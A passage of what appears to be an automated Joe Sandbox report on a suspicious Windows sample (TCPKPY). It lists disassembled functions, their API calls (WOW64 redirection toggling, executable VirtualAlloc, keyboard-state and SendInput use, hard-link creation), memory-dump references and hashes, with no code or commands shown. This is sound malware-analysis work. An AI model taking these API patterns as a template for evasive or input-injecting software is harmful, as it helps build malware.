                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                • API String ID: 2574300362-1355242751
                                                                                                                • Opcode ID: 4da771940da6d3099d7b4220bfc4f236d12319fb98cbb9897cb1ba0d4b85323b
                                                                                                                • Instruction ID: 2edc0c4eba8219779b1a72876df5a55ec6b203aaa7a7051cbf3cb78a5c9da2c4
                                                                                                                • Opcode Fuzzy Hash: 4da771940da6d3099d7b4220bfc4f236d12319fb98cbb9897cb1ba0d4b85323b
                                                                                                                • Instruction Fuzzy Hash: 06D0A7384207139FD720DF22F80C65277D8AF04705B004519E549D11D0D7B0C4948710
                                                                                                                Function 00203F32 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00203FAD,00203F28,?,00203F78,?,00203FAD,?,?,?,?,002034E2,?,00000001), ref: 00203F40
                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00203F52
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                • API String ID: 2574300362-3689287502
                                                                                                                • Opcode ID: 648fb44a40ebe4e030b599da05605f6b72d452375758a967ac615956ea144a56
                                                                                                                • Instruction ID: 0f12c14f29b72248e1e4799b0e58ed2b693984b89954492e75c604590f279e5f
                                                                                                                • Opcode Fuzzy Hash: 648fb44a40ebe4e030b599da05605f6b72d452375758a967ac615956ea144a56
                                                                                                                • Instruction Fuzzy Hash: A2D0A7398247139FD7309F21F81C68177E8AF04705B004819E64DD15D0D7B0C9988710
                                                                                                                Function 0023A8C8 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 99ce2e351e12995aa1cdade5dae985cb77901434f93e62438e75e3749da3eae0
                                                                                                                • Instruction ID: a0cefeb7119bb2dd58017609bcab3691a56218869e14c54c2f5b191393c5433c
                                                                                                                • Opcode Fuzzy Hash: 99ce2e351e12995aa1cdade5dae985cb77901434f93e62438e75e3749da3eae0
                                                                                                                • Instruction Fuzzy Hash: 35C18FB5A20216EFDB14CF94C884EAEF7B6FF48704F1045A9E841AB251D770DE51CBA1
                                                                                                                Function 0020AA70 Relevance: 6.3, APIs: 4, Instructions: 300COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00256AA6), ref: 0020AB2D
                                                                                                                • _wcscmp.LIBCMT ref: 0020AB49
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper_wcscmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 820872866-0
                                                                                                                • Opcode ID: 195d7c5835ce2d6a1355277b0ceaf604b8f83be340b11f475e89aee96d9b40f2
                                                                                                                • Instruction ID: 32263d4c9d1e3b1e2682184df9aea155c7711fa38662a129bbb2b1c5a14ca614
                                                                                                                • Opcode Fuzzy Hash: 195d7c5835ce2d6a1355277b0ceaf604b8f83be340b11f475e89aee96d9b40f2
                                                                                                                • Instruction Fuzzy Hash: A0A1F370B2030BDBDB15EF64E9856A9B7B5FF54300FA4416AEC16872D2DB309870DB46
                                                                                                                Function 00260D01 Relevance: 6.3, APIs: 4, Instructions: 300memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CharLowerBuffW.USER32(?,?), ref: 00260D85
                                                                                                                • CharLowerBuffW.USER32(?,?), ref: 00260DC8
                                                                                                                  • Part of subcall function 00260458: CharLowerBuffW.USER32(?,?,?,?), ref: 00260478
                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00260FB2
                                                                                                                • _memmove.LIBCMT ref: 00260FC2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 3659485706-0
                                                                                                                • Opcode ID: f2e688f6e52ced0e494aa979d94d01d8076f9d58026686ceb4aa221514dabd27
                                                                                                                • Instruction ID: b889291ee77e78b9c766f451011bce872ae3df6cb491e0adf2d86b31bccf2a27
                                                                                                                • Opcode Fuzzy Hash: f2e688f6e52ced0e494aa979d94d01d8076f9d58026686ceb4aa221514dabd27
                                                                                                                • Instruction Fuzzy Hash: 78B1AD716243018FC714DF28C88096AB7E4EF89314F14896EF8999B352DB31ED95CF92
                                                                                                                Function 0025AF26 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000), ref: 0025AF56
                                                                                                                • CoUninitialize.OLE32 ref: 0025AF61
                                                                                                                  • Part of subcall function 00241050: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 002410B8
                                                                                                                • VariantInit.OLEAUT32(?), ref: 0025AF6C
                                                                                                                • VariantClear.OLEAUT32(?), ref: 0025B23F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 780911581-0
                                                                                                                • Opcode ID: 6970d593d590ab313690aeed53b6776cc71d57fac497747cf230c9d5c72904df
                                                                                                                • Instruction ID: 541e97233e3242b5ecd3d7c8b4308b714ffa707fd94f50fd0c5607e33a0e0f9c
                                                                                                                • Opcode Fuzzy Hash: 6970d593d590ab313690aeed53b6776cc71d57fac497747cf230c9d5c72904df
                                                                                                                • Instruction Fuzzy Hash: A9A16C356247029FC711DF14C891B1AB7E4BF88360F158459F999AB3A2DB30ED68CF86
                                                                                                                Function 002242EB Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 3877424927-0
                                                                                                                • Opcode ID: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                                                                                                                • Instruction ID: fcc7d2bfaa4381481dbfbb9c3b3eb764bb6f21182f52caed19c7f22dcf606a35
                                                                                                                • Opcode Fuzzy Hash: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                                                                                                                • Instruction Fuzzy Hash: BA51BB30A20226BBDB24FFE9A84069E77B5AF40320F248769F865961D0D7B09D71DF40
                                                                                                                Function 0026C2E7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0026C354
                                                                                                                • ScreenToClient.USER32(?,00000002), ref: 0026C384
                                                                                                                • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0026C3EA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3880355969-0
                                                                                                                • Opcode ID: ebc1a57f2145e2579b65f7792e0816bf705d06034727dcb150ca15ee105d9309
                                                                                                                • Instruction ID: f833f597d762fb7ac12c4210515aff3b0db9ce7a19e7509e1636c19f9a952cb6
                                                                                                                • Opcode Fuzzy Hash: ebc1a57f2145e2579b65f7792e0816bf705d06034727dcb150ca15ee105d9309
                                                                                                                • Instruction Fuzzy Hash: 96517E31910209EFDF10EF68D884ABE7BA5FB45360F208259F8559B291D730EDA1CB90
                                                                                                                Function 0023D206 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0023D258
                                                                                                                • __itow.LIBCMT ref: 0023D292
                                                                                                                  • Part of subcall function 0023D4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0023D549
                                                                                                                • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0023D2FB
                                                                                                                • __itow.LIBCMT ref: 0023D350
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$__itow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3379773720-0
                                                                                                                • Opcode ID: 43171476a873b246c5734aec15f6ceda758408ea44212a96750da58dc5b0cbae
                                                                                                                • Instruction ID: c281182a6129a3811d5c5b79399ed4cbca138fdedff76341c52d0128be928a33
                                                                                                                • Opcode Fuzzy Hash: 43171476a873b246c5734aec15f6ceda758408ea44212a96750da58dc5b0cbae
                                                                                                                • Instruction Fuzzy Hash: 3E4193B1A10309ABDF11EF54D842BEE7BB9AF48700F000059FA05A3182DB719E65CF52
                                                                                                                Function 0024EE88 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0024EF32
                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 0024EF58
                                                                                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0024EF7D
                                                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0024EFA9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 3321077145-0
                                                                                                                • Opcode ID: 5ec272b14cfc6087a2c2fa9d014f06528af1c7b9f607591777dc31164155c042
                                                                                                                • Instruction ID: 69cf18b4021a718e978259d570264786e8a6ecbca8600a649ba7da93e0ca725a
                                                                                                                • Opcode Fuzzy Hash: 5ec272b14cfc6087a2c2fa9d014f06528af1c7b9f607591777dc31164155c042
                                                                                                                • Instruction Fuzzy Hash: B8413A39610611DFCB14EF15C584A49BBE5FF99320B1A8088E846AF3A2CB30FD64DF91
                                                                                                                Function 0026B354 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0026B3E1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InvalidateRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 634782764-0
                                                                                                                • Opcode ID: ba04cf6f72855b95409257d158452cbdb112bcc00b75b18be0dec13231f13383
                                                                                                                • Instruction ID: 9a9c7dd166e67d8886874eeda8402f961ac5f103500c85ab58c9f215b384db00
                                                                                                                • Opcode Fuzzy Hash: ba04cf6f72855b95409257d158452cbdb112bcc00b75b18be0dec13231f13383
                                                                                                                • Instruction Fuzzy Hash: 2731E434630249FBEF269F18DCA9FA83765AB05350F248112FA51D62E2DB70D8F09B51
                                                                                                                Function 0026D5EE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ClientToScreen.USER32(?,?), ref: 0026D617
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0026D68D
                                                                                                                • PtInRect.USER32(?,?,0026EB2C), ref: 0026D69D
                                                                                                                • MessageBeep.USER32(00000000), ref: 0026D70E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1352109105-0
                                                                                                                • Opcode ID: 04e1e3661ddff5c652208093a660ca9ea93eea4f7cb55361b6ae2ee5142ebb45
                                                                                                                • Instruction ID: bf5d8246c8434b711bb3411ae912555ed3411e278fcbdbeedfcb07e07f83df34
                                                                                                                • Opcode Fuzzy Hash: 04e1e3661ddff5c652208093a660ca9ea93eea4f7cb55361b6ae2ee5142ebb45
                                                                                                                • Instruction Fuzzy Hash: 22418D34F14119DFDB12CF59E885FA9BBF9BF45304F1841AAE4099B291D730E8A1CB90
                                                                                                                Function 00244497 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 002444EE
                                                                                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 0024450A
                                                                                                                • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 0024456A
                                                                                                                • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 002445C8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 432972143-0
                                                                                                                • Opcode ID: 38fa4b8de7b8b83db5b10d5414410cedeb3963b4773575fe36e99470ac073ebe
                                                                                                                • Instruction ID: 49298343fd05eb528b7b25317fc4795d1cc3ff9a6061ad1c71e780f37586e0fd
                                                                                                                • Opcode Fuzzy Hash: 38fa4b8de7b8b83db5b10d5414410cedeb3963b4773575fe36e99470ac073ebe
                                                                                                                • Instruction Fuzzy Hash: E43148719202595FFF38AF649808BFEBBB59B69314F84021AF0C1931C1C7749E68CB61
                                                                                                                Function 00234DB4 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00234DE8
                                                                                                                • __isleadbyte_l.LIBCMT ref: 00234E16
                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00234E44
                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00234E7A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                • String ID:
                                                                                                                • API String ID: 3058430110-0
                                                                                                                • Opcode ID: 5a0088a91dd927af5a309bc9b97759cdb18fa263d0e2980e73458919f43c442f
                                                                                                                • Instruction ID: adbf9fd167f0f47240ab33254ef60262e65fb32ca833660b605ab374331e6dec
                                                                                                                • Opcode Fuzzy Hash: 5a0088a91dd927af5a309bc9b97759cdb18fa263d0e2980e73458919f43c442f
                                                                                                                • Instruction Fuzzy Hash: 9631B07162021AAFDF21AF75C845BAA7BB5FF42710F1545A9E821871A0E730F860DB90
                                                                                                                Function 00267AA2 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32 ref: 00267AB6
                                                                                                                  • Part of subcall function 002469C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 002469E3
                                                                                                                  • Part of subcall function 002469C9: GetCurrentThreadId.KERNEL32 ref: 002469EA
                                                                                                                  • Part of subcall function 002469C9: AttachThreadInput.USER32(00000000,?,00248127), ref: 002469F1
                                                                                                                • GetCaretPos.USER32(?), ref: 00267AC7
                                                                                                                • ClientToScreen.USER32(00000000,?), ref: 00267B00
                                                                                                                • GetForegroundWindow.USER32 ref: 00267B06
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2759813231-0
                                                                                                                • Opcode ID: 50ce9c16c75f7ece644924578e7c4a3459a2b9de3cd72ba8f0cf0c34a8c9bfb9
                                                                                                                • Instruction ID: f1ea167086fc29adb254ffd660ff54c8d5beebdcf1eb0f2addc183879628f0cc
                                                                                                                • Opcode Fuzzy Hash: 50ce9c16c75f7ece644924578e7c4a3459a2b9de3cd72ba8f0cf0c34a8c9bfb9
                                                                                                                • Instruction Fuzzy Hash: AD313E76D10108AFCB00EFB5D8858EFBBF9EF58314B50806AF815E3211D6349E598FA0
                                                                                                                Function 0026EFA8 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0021AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0021AF8E
                                                                                                                • GetCursorPos.USER32(?), ref: 0026EFE2
                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0027F3C3,?,?,?,?,?), ref: 0026EFF7
                                                                                                                • GetCursorPos.USER32(?), ref: 0026F041
                                                                                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0027F3C3,?,?,?), ref: 0026F077
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
